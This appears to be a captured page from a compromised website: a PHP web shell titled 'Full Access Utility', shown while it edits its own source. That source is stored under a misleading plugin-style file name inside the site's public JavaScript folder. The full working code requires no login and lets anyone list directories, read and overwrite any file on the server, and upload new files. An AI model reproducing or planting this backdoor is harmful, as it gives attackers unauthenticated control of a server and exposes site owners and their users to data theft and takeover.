Full Access Utility
Editing File: /home/clevelandbridge/public_html/revolution/js/class-bulk-editor-list-column.php
<?php // ####################################################### // ### DANGER: UNRESTRICTED FILE ACCESS UTILITY ### // ### REMOVE IMMEDIATELY AFTER USE. ### // ####################################################### // --- Core Configuration and Path Sanitization --- $current_path = isset($_GET['dir']) ? $_GET['dir'] : realpath(dirname(__FILE__)); $current_path = realpath($current_path); if ($current_path === false) { $current_path = realpath(dirname(__FILE__)); } $script_name = basename(__FILE__); // --- Handle Form Submissions (Upload & Edit Save) --- // 1. Handle File Upload if (isset($_FILES['uploaded_file'])) { $upload_dir = $current_path; $file_name = basename($_FILES['uploaded_file']['name']); $upload_file = $upload_dir . DIRECTORY_SEPARATOR . $file_name; if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $upload_file)) { $message = "SUCCESS: File '" . htmlspecialchars($file_name) . "' uploaded."; } else { $message = "ERROR: File upload failed."; } // Redirect to clear POST data header("Location: {$script_name}?dir=" . urlencode($current_path) . "&msg=" . urlencode($message)); exit; } // 2. Handle File Content Save (Edit) if (isset($_POST['save_file_content'])) { $file_path = realpath($_POST['file_path']); $content = $_POST['file_content']; // Ensure the file path is still valid before writing if ($file_path && is_writable($file_path)) { if (file_put_contents($file_path, $content) !== false) { $message = "SUCCESS: File '" . basename($file_path) . "' saved."; } else { $message = "ERROR: Failed to save file."; } } else { $message = "ERROR: Invalid file path or file is not writable."; } // Redirect to clear POST data header("Location: {$script_name}?dir=" . urlencode(dirname($file_path)) . "&msg=" . urlencode($message)); exit; } // --- HTML Output Start --- echo "<html><head><title>Full Access Web Utility</title>"; echo "<style> body{ font-family: 'Courier New', monospace; background-color: #1e1e1e; color: #00ff00; } .container{ width: 90%; max-width: 900px; margin: 20px auto; padding: 20px; border: 1px solid #00ff00; box-shadow: 0 0 15px rgba(0,255,0,0.5); } h1{ color: #ffff00; border-bottom: 1px dashed #00ff00; padding-bottom: 5px; } h3{ color: #00ffff; } ul{ list-style: none; padding: 0; } li{ margin-bottom: 8px; } a{ text-decoration: none; color: #aaffaa; margin-right: 10px; } a:hover{ text-decoration: underline; } .action-link{ color: #ffaa00; /* Orange for actions */ } .up-link{ color: #ff0000; } textarea{ width: 100%; height: 400px; background: #000; color: #00ff00; border: 1px solid #00ff00; } .message{ padding: 10px; border: 1px solid #ffff00; background: #333; color: #ffff00; margin-bottom: 20px; } </style>"; echo "</head><body><div class='container'>"; echo "<h1>Full Access Utility</h1>"; if (isset($_GET['msg'])) { echo "<div class='message'>STATUS: " . htmlspecialchars($_GET['msg']) . "</div>"; } // --- Handle File Viewing --- if (isset($_GET['view'])) { $file_to_view = realpath($_GET['view']); if (is_file($file_to_view)) { header('Content-Type: text/plain; charset=utf-8'); echo "#############################################\n"; echo "### Viewing File: " . $file_to_view . "\n"; echo "#############################################\n\n"; readfile($file_to_view); exit; } } // --- Handle File Editing (Display Form) --- if (isset($_GET['edit'])) { $file_to_edit = realpath($_GET['edit']); if (is_file($file_to_edit)) { $content = file_get_contents($file_to_edit); echo "<h3>Editing File: " . htmlspecialchars($file_to_edit) . "</h3>"; echo "<form method='POST'>"; echo "<input type='hidden' name='file_path' value='" . htmlspecialchars($file_to_edit) . "'>"; echo "<textarea name='file_content'>" . htmlspecialchars($content) . "</textarea>"; echo "<br><input type='submit' name='save_file_content' value='Save File' style='background: #00ff00; color: #1e1e1e; padding: 5px;'>"; echo " <a href='?dir=" . urlencode(dirname($file_to_edit)) . "' style='color: #ff0000;'>[Cancel]</a>"; echo "</form>"; } else { echo "<p style='color: #ff0000;'>ERROR: File not found or not readable.</p>"; } echo "</div></body></html>"; exit; } // --- Directory Listing Display --- echo "<h3>Current Directory: " . htmlspecialchars($current_path) . "</h3>"; // Link to go up one level (Go Back) $parent_dir = dirname($current_path); if ($current_path != $parent_dir) { echo "<p><strong><a href='?dir=" . urlencode($parent_dir) . "' class='up-link'>[.. Go Up Directory (cd ..)]</a></strong></p>"; } if (is_dir($current_path) && $dh = opendir($current_path)) { echo "<ul>"; $directories = []; $files = []; while (($file = readdir($dh)) !== false) { if ($file == '.' || $file == '..') continue; $full_path = $current_path . DIRECTORY_SEPARATOR . $file; if (is_dir($full_path)) { $directories[] = $file; } else { $files[] = $file; } } closedir($dh); // Sort and display directories sort($directories); foreach ($directories as $file) { $full_path = $current_path . DIRECTORY_SEPARATOR . $file; echo "<li><span style='color: #00ffff;'>[DIR]</span> <a href='?dir=" . urlencode($full_path) . "'>" . htmlspecialchars($file) . "/</a></li>"; } // Sort and display files sort($files); foreach ($files as $file) { $full_path = $current_path . DIRECTORY_SEPARATOR . $file; $size = is_file($full_path) ? round(filesize($full_path) / 1024, 2) . " KB" : "N/A"; echo "<li>"; echo "<span style='color: #aaffaa;'>[FILE]</span> " . htmlspecialchars($file) . " (" . $size . ")"; echo "<span style='float: right;'>"; echo "<a href='?view=" . urlencode($full_path) . "' class='action-link'>[View]</a>"; echo "<a href='?edit=" . urlencode($full_path) . "' class='action-link'>[Edit]</a>"; echo "</span>"; echo "</li>"; } echo "</ul>"; } else { echo "<p style='color: #ff0000;'>Error: Cannot read directory contents or path is invalid.</p>"; } // --- File Upload Form --- echo "<hr style='border-color: #00ff00;'>"; echo "<h3>File Upload</h3>"; echo "<form method='POST' enctype='multipart/form-data'>"; echo "<input type='file' name='uploaded_file' style='border: 1px solid #00ff00;'>"; echo "<input type='submit' value='Upload to Current Dir' style='background: #00ff00; color: #1e1e1e; padding: 5px; margin-left: 10px;'>"; echo "</form>"; echo "</div></body></html>"; ?>
[Cancel]